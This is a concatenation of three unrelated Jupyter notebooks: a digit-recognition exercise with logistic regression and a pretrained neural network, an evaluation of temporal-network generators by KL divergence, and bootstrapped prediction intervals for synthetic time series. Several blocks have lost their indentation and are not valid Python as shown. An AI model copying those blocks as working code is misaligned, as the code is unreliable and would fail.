X_t = np.concatenate((np.ones((5, 1)), np.arange(1, 16).reshape((5, 3), order='F')/10), axis=1)
y_t = np.array([1, 0, 1, 0, 1])
lambda_t = 3
J, grad = lrCostFunction(theta_t, X_t, y_t, lambda_t)
print('Cost: {:.6f}'.format(J[0, 0]))
print('Expected: 2.534819')
print('Gradients: \n{}'.format(grad))
print('Expected: \n0.146561\n -0.548558\n 0.724722\n 1.398003\n')
```
### 1.4 One-vs-all Classification
Here, we implement one-vs-all classification by training multiple regularized logistic regression classifiers, one for each of the K classes in our dataset (K = 10 in this case).
```
from scipy.optimize import minimize
def oneVsAll(X, y, num_class, lmd):
    """Trains num_class logistic regression classifiers and returns them in a
    matrix all_theta, where the i-th row of all_theta corresponds to the
    classifier for label i.
    """
    # m is the number of training samples, n is the number of features + 1
    m, n = X.shape
    # store theta results
    all_theta = np.zeros((num_class, n))
    # initial condition, 1d array
    theta0 = np.zeros(n)
    # train one theta at a time
    for i in range(num_class):
        # ylabel is 1 for samples of class i and 0 otherwise
        ylabel = (y==i).astype(int)
        # run optimization
        result = minimize(lrCostFunction, theta0, args=(X, ylabel, lmd), method='CG',
                          jac=True, options={'disp': True, 'maxiter': 1000})
        all_theta[i, :] = result.x
    return all_theta
# prepare parameters
lmd = 0.1
m = len(y)
X_wb = np.concatenate((np.ones((m, 1)), X), axis=1)
num_class = 10 # 10 classes, digits 0 to 9
print(X_wb.shape)
print(y.shape)
# Run training
all_theta = oneVsAll(X_wb, y, num_class, lmd)
```
#### One-vs-all Prediction
```
def predictOneVsAll(all_theta, X):
    """Returns a vector of predictions for each example in the matrix X.
    X contains the examples in rows; all_theta is a matrix where the i-th row
    is a trained logistic regression theta vector for the i-th class.
    """
    # each row of `out` holds the K class scores for one sample;
    # np.argmax picks the label with the largest score
    out = (all_theta @ X.T).T
    return np.argmax(out, axis=1)
# prediction accuracy
pred = predictOneVsAll(all_theta, X_wb)
print(pred.shape)
accuracy = np.sum((pred==y).astype(int))/m*100
print('Training accuracy is {:.2f}%'.format(accuracy))
```
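Stripped of the training step, the one-vs-all prediction above is just a matrix of class scores followed by an argmax. A minimal self-contained sketch; `all_theta` and `X` here are made-up toy values, not the trained parameters:

```python
import numpy as np

# Toy one-vs-all prediction: 3 classes, 2 features + bias.
# Each row of all_theta is the (hand-picked, illustrative) classifier
# for one class; each row of X is one sample with a leading bias term.
all_theta = np.array([
    [0.0,  1.0,  0.0],   # classifier for class 0
    [0.0,  0.0,  1.0],   # classifier for class 1
    [0.0, -1.0, -1.0],   # classifier for class 2
])
X = np.array([
    [1.0,  2.0,  0.1],
    [1.0,  0.1,  2.0],
    [1.0, -2.0, -2.0],
])
scores = (all_theta @ X.T).T      # (m, K) matrix of class scores
pred = np.argmax(scores, axis=1)  # pick the highest-scoring class
print(pred)                       # -> [0 1 2]
```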
## 2. Neural Networks
In the previous part of this exercise, you implemented multi-class logistic regression to recognize handwritten digits. However, logistic regression cannot form more complex hypotheses, as it is only a linear classifier.
In this part of the exercise, you will implement a neural network to recognize handwritten digits, using the same training set as before. The neural network is able to represent complex models that form non-linear hypotheses.
For this week, you will use parameters from a neural network that we have already trained. Your goal is to implement the feedforward propagation algorithm to use our weights for prediction.
Our neural network is shown in Figure 2. It has 3 layers: an input layer, a hidden layer and an output layer. Recall that our inputs are pixel values of digit images. Since the images are of size 20x20, this gives us 400 input layer units (excluding the extra bias unit, which always outputs +1). As before, the training data will be loaded into the variables X and y.
A set of pre-trained network parameters ($\Theta^{(1)}, \Theta^{(2)}$) is provided and stored in ex3weights.mat. The neural network used contains 25 units in the 2nd layer and 10 output units (corresponding to the 10 digit classes).

```
from scipy.io import loadmat
data = loadmat('ex3weights.mat')
Theta1 = data["Theta1"] # 25x401 np array
Theta2 = data["Theta2"] # 10x26 np array (2d)
print(Theta1.shape, Theta2.shape)
```
### Vectorizing the forward propagation
Matrix dimensions:
- $X_{wb}$: 5000 × 401
- $\Theta^{(1)}$: 25 × 401
- $\Theta^{(2)}$: 10 × 26
- $a^{(2)}$: 5000 × 25, or 5000 × 26 after adding the intercept term
- $a^{(3)}$: 5000 × 10

$$a^{(2)} = g(X_{wb}\Theta^{(1)^T})$$
$$a^{(3)} = g(a^{(2)}_{wb}\Theta^{(2)^T})$$
```
def predict(X, Theta1, Theta2):
""" predicts output given network parameters Theta1 and Theta2 in Theta.
The prediction from the neural network will be the label that has the largest output.
"""
a2 = sigmoid(X @ Theta1.T)
# add intercept terms to a2
m, n = a2.shape
a2_wb = np.concatenate((np.ones((m, 1)), a2), axis=1)
a3 = sigmoid(a2_wb @ Theta2.T)
# print(a3[:10, :])
# apply np.argmax to the output matrix to find the predicted label
# for that training sample
# correct for indexing difference between MATLAB and Python
p = np.argmax(a3, axis=1) + 1
p[p==10] = 0
return p # this is a 1d array
# prediction accuracy
pred = predict(X_wb, Theta1, Theta2)
print(pred.shape)
accuracy = np.sum((pred==y).astype(int))/m*100
print('Training accuracy is {:.2f}%'.format(accuracy))
# randomly show 10 images and corresponding results
# randomly select 10 data points to display
rand_indices = np.random.randint(0, 5000, size=10)
sel = X[rand_indices, :]
for i in range(10):
# Display predicted digit
print("Predicted {} for this image: ".format(pred[rand_indices[i]]))
# display image
fig, ax = plt.subplots(figsize=(2, 2))
ax.imshow(sel[i, :].reshape(20, 20).T, cmap=plt.cm.gray, vmin=-1, vmax=1)
ax.axis('off')
plt.show()
```
---
```
import construction as cs
import matplotlib.pyplot as plt
### read font
from matplotlib import font_manager
font_dirs = ['Barlow/']
font_files = font_manager.findSystemFonts(fontpaths=font_dirs)
for font_file in font_files:
font_manager.fontManager.addfont(font_file)
# set font
plt.rcParams['font.family'] = 'Barlow'
import networkx as nx
%matplotlib inline
%config InlineBackend.figure_format = 'retina'
%load_ext autoreload
%autoreload 2
```
# Load generated graphs
```
def load_origin_graph(file_name, gap=299):
    data_in = cs.load_data("../Datasets/"+file_name+".dat")
    graphs_in = cs.build_graphs(data_in, gap=gap)
    return graphs_in
def load_ETNgen_graph(file_name):
path = "../Generated_graphs/Multiple_run/"+file_name+"/"
gap = 299
graphs = []
for i in os.listdir(path):
data_in = cs.load_data(path+i)
graphs_in = cs.build_graphs(data_in,gap=gap)
graphs.append(graphs_in)
return graphs
def _load_generated(base_path, file_name):
    """Loads every generated run found under base_path/file_name/
    (shared by the Dymond, STM and TagGen loaders below)."""
    path = base_path + file_name + "/"
    gap = 0
    graphs = []
    for i in os.listdir(path):
        print(path + i)
        data_in = cs.load_data(path + i)
        graphs_in = cs.build_graphs(data_in, gap=gap)
        graphs.append(graphs_in)
    return graphs
def load_dym_graph(file_name):
    return _load_generated("../Competitors_generated_graphs/Dymond/Multiple_run/", file_name)
def load_stm_graph(file_name):
    return _load_generated("../Competitors_generated_graphs/STM/Multiple_run/", file_name)
def load_tag_graph(file_name):
    return _load_generated("../Competitors_generated_graphs/TagGen/Multiple_run/", file_name)
import networkx as nx
import numpy as np
from scipy import stats
import matplotlib.pyplot as plt
from topological_metrics import *
import os
```
# Compute and store topological distributions
```
file_name = "High_School11"
orig_graphs = load_origin_graph(file_name,gap=299)
etn_gen = load_ETNgen_graph(file_name)
dym_gen = load_dym_graph(file_name)
tag_gen = load_tag_graph(file_name)
stm_gen = load_stm_graph(file_name)
def comp_metric(graphs,metric):
metric_dist = []
for graph in graphs:
metric_dist.append(metric(graph))
return metric_dist
def compute_store_metrics(metrics,metrics_names,generator,file_name,graphs):
for i in range(len(metrics)):
metric = metrics[i]
metric_name = metrics_names[i]
met = comp_metric(graphs,metric)
np.save("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/"+metric_name,met)
def compute_store_metrics_original(metrics,metrics_names,file_name,graphs):
for i in range(len(metrics)):
metric = metrics[i]
metric_name = metrics_names[i]
met = comp_metric([graphs],metric)
np.save("topology_results/original_distributions/"+file_name+"/"+metric_name,met)
metrics = [density,global_clustering,average_shortest_path,dist_number_of_individuals,
dist_number_of_new_conversations,get_ass,s_metric,dist_frequency_of_interactions,
dist_strength_of_nodes,dist_duration]
metrics_names = ["density","clust","asp","nb_interactions",
"new_con","ass","s_metric","interacting_indiv",
"streng","dur"]
compute_store_metrics_original(metrics,metrics_names,file_name,orig_graphs)
compute_store_metrics(metrics,metrics_names,
"etngen",
file_name,
etn_gen)
compute_store_metrics(metrics,metrics_names,
"taggen",
file_name,
tag_gen)
compute_store_metrics(metrics,metrics_names,
"stmgen",
file_name,
stm_gen)
compute_store_metrics(metrics,metrics_names,
"dymgen",
file_name,
dym_gen)
```
# load distributions
```
def load_topo_distributions(generator,file_name):
den = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/density.npy",allow_pickle=True)
clust = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/clust.npy",allow_pickle=True)
asp = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/asp.npy",allow_pickle=True)
nb_inter = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/nb_interactions.npy",allow_pickle=True)
new_conv = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/new_con.npy",allow_pickle=True)
ass = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/ass.npy",allow_pickle=True)
s_met = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/s_metric.npy",allow_pickle=True)
inter_indiv = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/interacting_indiv.npy",allow_pickle=True)
stren = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/streng.npy",allow_pickle=True)
durat = np.load("topology_results/"+generator+"/Multiple_run/distributions/"+file_name+"/dur.npy",allow_pickle=True)
return asp,ass,clust,stren,durat,s_met,new_conv,inter_indiv,den,nb_inter
def load_topo_original(file_name):
den = np.load("topology_results/original_distributions/"+file_name+"/density.npy",allow_pickle=True)
clust = np.load("topology_results/original_distributions/"+file_name+"/clust.npy",allow_pickle=True)
asp = np.load("topology_results/original_distributions/"+file_name+"/asp.npy",allow_pickle=True)
nb_inter = np.load("topology_results/original_distributions/"+file_name+"/nb_interactions.npy",allow_pickle=True)
new_conv = np.load("topology_results/original_distributions/"+file_name+"/new_con.npy",allow_pickle=True)
ass = np.load("topology_results/original_distributions/"+file_name+"/ass.npy",allow_pickle=True)
s_met = np.load("topology_results/original_distributions/"+file_name+"/s_metric.npy",allow_pickle=True)
inter_indiv = np.load("topology_results/original_distributions/"+file_name+"/interacting_indiv.npy",allow_pickle=True)
stren = np.load("topology_results/original_distributions/"+file_name+"/streng.npy",allow_pickle=True)
durat = np.load("topology_results/original_distributions/"+file_name+"/dur.npy",allow_pickle=True)
return asp,ass,clust,stren,durat,s_met,new_conv,inter_indiv,den,nb_inter
def compute_counts(ro, e):
    """Counts how many values of e fall in each bin defined by the
    bin edges ro (half-open intervals (r1, r2])."""
    counts = []
    e = np.array(e)
    for i in range(len(ro)-1):
        r1 = ro[i]
        r2 = ro[i+1]
        ee = e[e>r1]
        count = ee[ee<=r2]
        counts.append(len(count))
    return counts
def compute_multpile_counts(ranges, ee):
    """Applies compute_counts to each distribution in ee."""
    counts = []
    for e in ee:
        counts.append(compute_counts(ranges, e))
    return counts
# example of calculating the kl divergence between two mass functions
from math import log2
# calculate the kl divergence
def kl_divergence_max(d2, d1):
    """KL divergence in bits between two (possibly different-length)
    histograms: pads the shorter one with zeros, adds a small epsilon to
    avoid log(0), and returns sum(d1 * log2(d1/d2)), i.e. KL(d1 || d2)
    where d1 is the *second* argument."""
    max_len = max(len(d1), len(d2))
    new_d1 = np.zeros(max_len)
    new_d1[:len(d1)] = d1
    new_d2 = np.zeros(max_len)
    new_d2[:len(d2)] = d2
    E = 0.0000001
    new_d1 = new_d1 + E
    new_d2 = new_d2 + E
    res = 0
    for i in range(max_len):
        d1 = new_d1[i]
        d2 = new_d2[i]
        if (d1 != 0) and (d2 != 0):
            res = res + (d1 * log2(d1/d2))
    return res
```
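To make the padding-and-epsilon behaviour of `kl_divergence_max` concrete, here is a self-contained re-implementation of the same idea on two short histograms (the function name and values are illustrative, not part of the pipeline above):

```python
import numpy as np

def kl_bits(p, q, eps=1e-7):
    """KL(p || q) in bits: pad the shorter histogram with zeros and add a
    small epsilon so empty bins cannot produce log(0) or division by zero."""
    n = max(len(p), len(q))
    p = np.pad(np.asarray(p, dtype=float), (0, n - len(p))) + eps
    q = np.pad(np.asarray(q, dtype=float), (0, n - len(q))) + eps
    return float(np.sum(p * np.log2(p / q)))

# identical distributions -> divergence is 0
print(round(kl_bits([0.5, 0.5], [0.5, 0.5]), 6))   # -> 0.0
# different lengths: the padded zero bin is what the epsilon protects
print(kl_bits([0.5, 0.5], [0.25, 0.25, 0.5]) > 0)  # -> True
```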
```
def compute_ks_all_metrics(nb_bins,file_name):
res_etn = []
res_tag = []
res_stm = []
res_dym = []
o_in = load_topo_original(file_name)
e_in = load_topo_distributions("etngen",file_name)
t_in = load_topo_distributions("taggen",file_name)
d_in = load_topo_distributions("dymgen",file_name)
s_in = load_topo_distributions("stmgen",file_name)
all_res = []
for i in range(10):
o = o_in[i]
e = e_in[i]
t = t_in[i]
d = d_in[i]
s = s_in[i]
#if i == 1 or i == 5 or i == 6:
biggest_dist = o[0]
#else:
#biggest_dist = np.max(t)
        _, tranges = np.histogram(biggest_dist, bins=nb_bins)
oc = compute_counts(tranges,o)
ec = compute_multpile_counts(tranges,e)
dc = compute_multpile_counts(tranges,d)
tc = compute_multpile_counts(tranges,t)
sc = compute_multpile_counts(tranges,s)
oc = oc/np.sum(oc)
ec = [np.array(x)/sum(x) for x in ec]
dc = [np.array(x)/sum(x) for x in dc]
tc = [np.array(x)/sum(x) for x in tc]
sc = [np.array(x)/sum(x) for x in sc]
ec_kl = []
tc_kl = []
sc_kl = []
dc_kl = []
for i in ec:
ec_kl.append(kl_divergence_max(i,oc))
for i in tc:
tc_kl.append(kl_divergence_max(i,oc))
for i in dc:
dc_kl.append(kl_divergence_max(i,oc))
for i in sc:
sc_kl.append(kl_divergence_max(i,oc))
        maximum_for_norm = max(np.nanmax(ec_kl),np.nanmax(tc_kl),np.nanmax(sc_kl),np.nanmax(dc_kl))
        ec_kl = ec_kl/maximum_for_norm
        tc_kl = tc_kl/maximum_for_norm
        sc_kl = sc_kl/maximum_for_norm
        dc_kl = dc_kl/maximum_for_norm
res = [[np.nanmean(ec_kl),np.nanstd(ec_kl)],[np.nanmean(tc_kl),np.nanstd(tc_kl)],
[np.nanmean(sc_kl),np.nanstd(sc_kl)],[np.nanmean(dc_kl),np.nanstd(dc_kl)]]
res_etn.append([np.nanmean(ec_kl),np.nanstd(ec_kl)])
res_tag.append([np.nanmean(tc_kl),np.nanstd(tc_kl)])
res_stm.append([np.nanmean(sc_kl),np.nanstd(sc_kl)])
res_dym.append([np.nanmean(dc_kl),np.nanstd(dc_kl)])
if False:
plt.figure(figsize=(15,5))
plt.subplot(1,5,1)
plt.bar(range(nb_bins),oc)
plt.title("orig")
plt.subplot(1,5,2)
plt.bar(range(nb_bins),ec[0])
plt.title("etn\n"+str(res[0])[0:5])
plt.subplot(1,5,3)
plt.bar(range(nb_bins),tc[0])
plt.title("tag\n"+str(res[1])[0:5])
plt.subplot(1,5,4)
plt.bar(range(nb_bins),sc[0])
plt.title("stm\n"+str(res[2])[0:5])
plt.subplot(1,5,5)
plt.bar(range(nb_bins),dc[0])
plt.title("diam\n"+str(res[3])[0:5])
plt.show()
#res2 = []
#ooo = o[0]/np.sum(o[0])
#eee = e[0]/np.sum(e[0])
#ttt = t[0]/np.sum(t[0])
#sss = s[0]/np.sum(s[0])
#ddd = d[0]/np.sum(d[0])
#res2.append(kl_divergence_max(ooo,eee))
#res2.append(kl_divergence_max(ooo,ttt))
#res2.append(kl_divergence_max(ooo,sss))
#res2.append(kl_divergence_max(ooo,ddd))
#if False:
# plt.figure(figsize=(15,5))
# plt.subplot(1,5,1)
# plt.hist(o[0],bins=10)
# plt.title("orig")
# plt.subplot(1,5,2)
# plt.hist(e[0],bins=10)
# plt.title("etn\n"+str(res2[0])[0:5])
# plt.subplot(1,5,3)
# plt.hist(t[0],bins=10)
# plt.title("tag\n"+str(res2[1])[0:5])
# plt.subplot(1,5,4)
# plt.hist(s[0],bins=10)
# plt.title("stm\n"+str(res2[2])[0:5])
# plt.subplot(1,5,5)
# plt.hist(d[0],bins=10)
# plt.title("diam\n"+str(res2[3])[0:5])
# plt.show()
return [np.array(res_etn),np.array(res_tag),np.array(res_stm),np.array(res_dym)]
ORIGINAL_COLOR = '#474747' #dark grey
ETN_COLOR = '#fb7041' #'#E5865E' # arancio
TAG_COLOR = '#96ccc8' # light blue
STM_COLOR = '#bad1f2' #8F2E27' # rosso
DYM_COLOR = '#559ca6' # teal
line_width = 1.5
idx =[2, 5, 1, 8, 9, 6, 4, 3, 0, 7]
tmp= ["Density",
"Global clustering \ncoefficient",
"Average shortest\npath length",
"Interacting\nindividuals",
"New conversations",
"Assortativity",
"S-metric",
"Number of interactions",
"Edge strength",
"Duration of contacts"]
tmp = np.array(tmp)
labels = tmp[idx]
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
nb_bins = 50
x1,x2,x3,x4 = compute_ks_all_metrics(nb_bins,"LH10")
x = np.arange(10) # the label locations
width = 0.2 # the width of the bars
fig, ax = plt.subplots(1,3,figsize=(12,10))
fig.tight_layout(pad=-4)
error_bar_style = dict(ecolor=ORIGINAL_COLOR, alpha=0.8, lw=1.5, capsize=3, capthick=1)
ax[0].title.set_text("Hospital")
rects1 = ax[0].barh(x + 0.3, x1[:,0], width, xerr=x1[:,1],label='ETN-gen',color=ETN_COLOR, error_kw=error_bar_style)
rects2 = ax[0].barh(x + 0.1, x2[:,0], width, xerr=x2[:,1],label='STM',color=STM_COLOR, error_kw=error_bar_style)
rects3 = ax[0].barh(x - 0.1, x3[:,0], width, xerr=x3[:,1],label='TagGen',color=TAG_COLOR, error_kw=error_bar_style)
rects4 = ax[0].barh(x - 0.3, x4[:,0], width, xerr=x4[:,1],label='Dymond',color=DYM_COLOR,error_kw=error_bar_style)
x1,x2,x3,x4 = compute_ks_all_metrics(nb_bins,"InVS13")
ax[1].title.set_text("Workplace")
rects1 = ax[1].barh(x + 0.3, x1[:,0], width, xerr=x1[:,1],label='ETN-gen',color=ETN_COLOR, error_kw=error_bar_style)
rects2 = ax[1].barh(x + 0.1, x2[:,0], width, xerr=x2[:,1],label='STM',color=STM_COLOR, error_kw=error_bar_style)
rects3 = ax[1].barh(x - 0.1, x3[:,0], width, xerr=x3[:,1],label='TagGen',color=TAG_COLOR, error_kw=error_bar_style)
rects4 = ax[1].barh(x - 0.3, x4[:,0], width, xerr=x4[:,1],label='Dymond',color=DYM_COLOR,error_kw=error_bar_style)
x1,x2,x3,x4 = compute_ks_all_metrics(nb_bins,"High_School11")
ax[2].title.set_text("High school")
rects1 = ax[2].barh(x + 0.3, x1[:,0], width, xerr=x1[:,1],label='ETN-gen',color=ETN_COLOR, error_kw=error_bar_style)
rects2 = ax[2].barh(x + 0.1, x2[:,0], width, xerr=x2[:,1],label='STM',color=STM_COLOR, error_kw=error_bar_style)
rects3 = ax[2].barh(x - 0.1, x3[:,0], width, xerr=x3[:,1],label='TagGen',color=TAG_COLOR, error_kw=error_bar_style)
rects4 = ax[2].barh(x - 0.3, x4[:,0], width, xerr=x4[:,1],label='Dymond',color=DYM_COLOR,error_kw=error_bar_style)
ax[0].set_yticks(x)
ax[0].set_yticklabels(labels)
ax[0].set_xlim(0,1)
ax[1].set_yticks(x)
ax[1].set_yticklabels([" "," "," "," "," "," "," "," "," "," "],rotation=0)
ax[1].set_xlim(0,1)
ax[2].set_yticks(x)
ax[2].set_xlim(0,1)
ax[2].set_yticklabels([" "," "," "," "," "," "," "," "," "," "],rotation=0)
ax[2].set_xticks([0,0.33,0.66,1])
ax[2].set_xticklabels(["0.0","0.33","0.66","1.0"])
ax[1].set_xticks([0,0.33,0.66,1])
ax[1].set_xticklabels(["0.0","0.33","0.66","1.0"])
ax[0].set_xticks([0,0.33,0.66,1])
ax[0].set_xticklabels(["0.0","0.33","0.66","1.0"])
ax[0].tick_params(bottom=True, right=False,left=False)
ax[0].set_axisbelow(True)
ax[0].xaxis.grid(True, color='#b3b3b3')
ax[0].yaxis.grid(False)
ax[1].tick_params(bottom=True, right=False,left=False)
ax[1].set_axisbelow(True)
ax[1].xaxis.grid(True, color='#b3b3b3')
ax[1].yaxis.grid(False)
ax[2].tick_params(bottom=True, right=False,left=False)
ax[2].set_axisbelow(True)
ax[2].xaxis.grid(True, color='#b3b3b3')
ax[2].yaxis.grid(False)
ax[0].spines['top'].set_visible(False)
ax[0].spines['right'].set_visible(False)
ax[0].spines['left'].set_visible(False)
ax[0].spines['bottom'].set_visible(False)
ax[1].spines['top'].set_visible(False)
ax[1].spines['right'].set_visible(False)
ax[1].spines['left'].set_visible(False)
ax[1].spines['bottom'].set_visible(False)
ax[2].spines['top'].set_visible(False)
ax[2].spines['right'].set_visible(False)
ax[2].spines['left'].set_visible(False)
ax[2].spines['bottom'].set_visible(False)
ax[0].legend(loc='upper right',ncol = 5,bbox_to_anchor=(1, -0.05))
fig.tight_layout()
plt.savefig("topology_main_kld_test1.pdf", bbox_inches = 'tight')
plt.show()
```
---
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.ensemble import *
from sklearn.linear_model import *
from sklearn.model_selection import train_test_split, GridSearchCV, cross_val_predict
### UTILITY FUNCTION FOR DATA GENERATION ###
def gen_sinusoidal(timesteps, amp, freq, noise):
X = np.arange(timesteps)
e = np.random.normal(0,noise, (timesteps,))
y = amp*np.sin(X*(2*np.pi/freq))+e
return y
def gen_randomwalk(timesteps, noise):
y = np.random.normal(0,noise, (timesteps,))
return y.cumsum()
### CREATE SYNTHETIC DATA ###
np.random.seed(0)
timesteps = 1000
data1 = gen_sinusoidal(timesteps=timesteps, amp=10, freq=24, noise=5)
data2 = gen_sinusoidal(timesteps=timesteps, amp=10, freq=24*7, noise=5)
data3 = gen_randomwalk(timesteps=timesteps, noise=1)
```
# STATIONARY DATA
```
### STORE DATA IN DF ###
data = data1 + data2
df = pd.DataFrame({
'X1':data1,
'X2':data2,
'Y':data
})
df.index = pd.date_range('2021', periods=timesteps, freq='H')
cols = df.columns
print(df.shape)
df.head()
### PLOT SYNTHETIC DATA ###
plt.figure(figsize=(16,4))
for i,c in enumerate(cols[:-1]):
plt.subplot(1,2,i+1)
df[c].plot(ax=plt.gca(), title=c, color='blue'); plt.xlabel(None)
plt.figure(figsize=(16,4))
df['Y'].plot(title='Y', color='red')
### CREATE ROLLING FEATURES ###
lags = [6, 12, 18, 24]
for l in lags:
for c in cols:
df[f"{c}_mean_t-{l}"] = df[c].rolling(l).mean()
df[f"{c}_std_t-{l}"] = df[c].rolling(l).std()
df['Y'] = df['Y'].shift(-1)
df.drop(cols[cols.str.startswith('X')], axis=1, inplace=True)
df.dropna(inplace=True)
### TRAIN TEST SPLIT ###
X_train, X_test, y_train, y_test = train_test_split(
df.drop('Y', axis=1), df['Y'],
test_size=24*7*2, shuffle=False)
X_train.shape, X_test.shape
### RANDOM FOREST TUNING ###
model = GridSearchCV(estimator=RandomForestRegressor(random_state=33),
param_grid={'max_depth': [8, 10, 12, None], 'n_estimators': [20, 30, 40]},
scoring='neg_mean_squared_error', cv=3, refit=True)
model.fit(X_train, y_train)
model.best_params_
### OUT-OF-FOLDS RESIDUAL DISTRIBUTION ###
pred_train = cross_val_predict(RandomForestRegressor(**model.best_params_, random_state=33),
X_train, y_train, cv=3)
res = y_train - pred_train
### PLOT RESIDUAL STATISTICS ###
plt.figure(figsize=(16,5))
plt.subplot(1,2,1)
plt.title('Residuals Distribution')
plt.hist(res, bins=20)
plt.subplot(1,2,2)
plt.title('Residuals Autocorrelation')
plt.plot([res.autocorr(lag=dt) for dt in range(1,200)])
plt.ylim([-1,1]); plt.axhline(0, c='black', linestyle='--')
plt.ylabel('Autocorrelation'); plt.xlabel('Lags')
plt.show()
### BOOTSTRAPPED INTERVALS ###
alpha = 0.05
bootstrap = np.asarray([np.random.choice(res, size=res.shape) for _ in range(100)])
q_bootstrap = np.quantile(bootstrap, q=[alpha/2, 1-alpha/2], axis=0)
y_pred = pd.Series(model.predict(X_test), index=X_test.index)
y_lower = y_pred + q_bootstrap[0].mean()
y_upper = y_pred + q_bootstrap[1].mean()
### PLOT BOOTSTRAPPED PREDICTION INTERVALS ###
plt.figure(figsize=(10,6))
y_pred.plot(linewidth=3)
y_test.plot(style='.k', alpha=0.5)
plt.fill_between(y_pred.index, y_lower, y_upper, alpha=0.3)
plt.title('RandomForest test predictions')
### HOW MANY OUTLIERS IN TEST DATA ###
((y_test > y_upper).sum() + (y_test < y_lower).sum()) / y_test.shape[0]
### RIDGE TUNING ###
model = GridSearchCV(estimator=Ridge(), param_grid={'alpha': [3, 5, 10, 20, 50]},
scoring='neg_mean_squared_error', cv=3, refit=True)
model.fit(X_train, y_train)
model.best_params_
### OUT-OF-FOLDS RESIDUAL DISTRIBUTION ###
pred_train = cross_val_predict(Ridge(**model.best_params_), X_train, y_train, cv=3)
res = y_train - pred_train
### PLOT RESIDUAL STATISTICS ###
plt.figure(figsize=(16,5))
plt.subplot(1,2,1)
plt.title('Residuals Distribution')
plt.hist(res, bins=20)
plt.subplot(1,2,2)
plt.title('Residuals Autocorrelation')
plt.plot([res.autocorr(lag=dt) for dt in range(1,200)])
plt.ylim([-1,1]); plt.axhline(0, c='black', linestyle='--')
plt.ylabel('Autocorrelation'); plt.xlabel('Lags')
plt.show()
### BOOTSTRAPPED INTERVALS ###
alpha = 0.05
bootstrap = np.asarray([np.random.choice(res, size=res.shape) for _ in range(100)])
q_bootstrap = np.quantile(bootstrap, q=[alpha/2, 1-alpha/2], axis=0)
y_pred = pd.Series(model.predict(X_test), index=X_test.index)
y_lower = y_pred + q_bootstrap[0].mean()
y_upper = y_pred + q_bootstrap[1].mean()
### PLOT BOOTSTRAPPED PREDICTION INTERVALS ###
plt.figure(figsize=(10,6))
y_pred.plot(linewidth=3)
y_test.plot(style='.k', alpha=0.5)
plt.fill_between(y_pred.index, y_lower, y_upper, alpha=0.3)
plt.title('Ridge test predictions')
### HOW MANY OUTLIERS IN TEST DATA ###
((y_test > y_upper).sum() + (y_test < y_lower).sum()) / y_test.shape[0]
```
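The interval construction used above can be isolated into a few lines: bootstrap the out-of-fold residuals, take the empirical alpha/2 quantiles, and shift the point forecast by them. A self-contained sketch on synthetic residuals (all values below are illustrative):

```python
import numpy as np

rng = np.random.default_rng(0)

# pretend these are out-of-fold residuals from some fitted model
res = rng.normal(0, 2, size=500)

# bootstrap the residuals and average the empirical quantiles,
# mirroring the q_bootstrap step above
alpha = 0.05
boot = np.asarray([rng.choice(res, size=res.shape) for _ in range(200)])
q_lo, q_hi = np.quantile(boot, q=[alpha / 2, 1 - alpha / 2], axis=0).mean(axis=1)

y_pred = np.array([10.0, 12.0, 9.5])  # hypothetical point forecasts
y_lower, y_upper = y_pred + q_lo, y_pred + q_hi
print(q_lo < 0 < q_hi)  # -> True: the band straddles the forecast
```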
# NOT STATIONARY DATA
```
### STORE DATA IN DF ###
data = data1 + data2 + data3
df = pd.DataFrame({
'X1':data1,
'X2':data2,
'X3':data3,
'Y':data
})
df.index = pd.date_range('2021', periods=timesteps, freq='H')
cols = df.columns
print(df.shape)
df.head()
### PLOT SYNTHETIC DATA ###
plt.figure(figsize=(16,11))
for i,c in enumerate(cols):
color = 'red' if c == 'Y' else 'blue'
plt.subplot(2,2,i+1)
df[c].plot(ax=plt.gca(), title=c, color=color); plt.xlabel(None)
### CREATE ROLLING FEATURES ###
lags = [6, 12, 18, 24]
for l in lags:
for c in cols:
df[f"{c}_mean_t-{l}"] = df[c].rolling(l).mean()
df[f"{c}_std_t-{l}"] = df[c].rolling(l).std()
df['Y'] = df['Y'].shift(-1)
df.drop(cols[cols.str.startswith('X')], axis=1, inplace=True)
df.dropna(inplace=True)
### TRAIN TEST SPLIT ###
X_train, X_test, y_train, y_test = train_test_split(
df.drop('Y', axis=1), df['Y'],
test_size=24*7*2, shuffle=False)
X_train.shape, X_test.shape
### RANDOM FOREST TUNING ###
model = GridSearchCV(estimator=RandomForestRegressor(random_state=33),
param_grid={'max_depth': [8, 10, 12, None], 'n_estimators': [20, 30, 40]},
scoring='neg_mean_squared_error', cv=3, refit=True)
model.fit(X_train, y_train)
model.best_params_
### OUT-OF-FOLDS RESIDUAL DISTRIBUTION ###
pred_train = cross_val_predict(RandomForestRegressor(**model.best_params_, random_state=33),
X_train, y_train, cv=3)
res = y_train - pred_train
### PLOT RESIDUAL STATISTICS ###
plt.figure(figsize=(16,5))
plt.subplot(1,2,1)
plt.title('Residuals Distribution')
plt.hist(res, bins=20)
plt.subplot(1,2,2)
plt.title('Residuals Autocorrelation')
plt.plot([res.autocorr(lag=dt) for dt in range(1,200)])
plt.ylim([-1,1]); plt.axhline(0, c='black', linestyle='--')
plt.ylabel('Autocorrelation'); plt.xlabel('Lags')
plt.show()
### BOOTSTRAPPED INTERVALS ###
alpha = 0.05
bootstrap = np.asarray([np.random.choice(res, size=res.shape) for _ in range(100)])
q_bootstrap = np.quantile(bootstrap, q=[alpha/2, 1-alpha/2], axis=0)
y_pred = model.predict(X_test)
y_lower = y_pred + q_bootstrap[0].mean()
y_upper = y_pred + q_bootstrap[1].mean()
### HOW MANY OUTLIERS IN TEST DATA ###
((y_test > y_upper).sum() + (y_test < y_lower).sum()) / y_test.shape[0]
### RIDGE TUNING ###
model = GridSearchCV(estimator=Ridge(), param_grid={'alpha': [3, 5, 10, 20, 50]},
scoring='neg_mean_squared_error', cv=3, refit=True)
model.fit(X_train, y_train)
model.best_params_
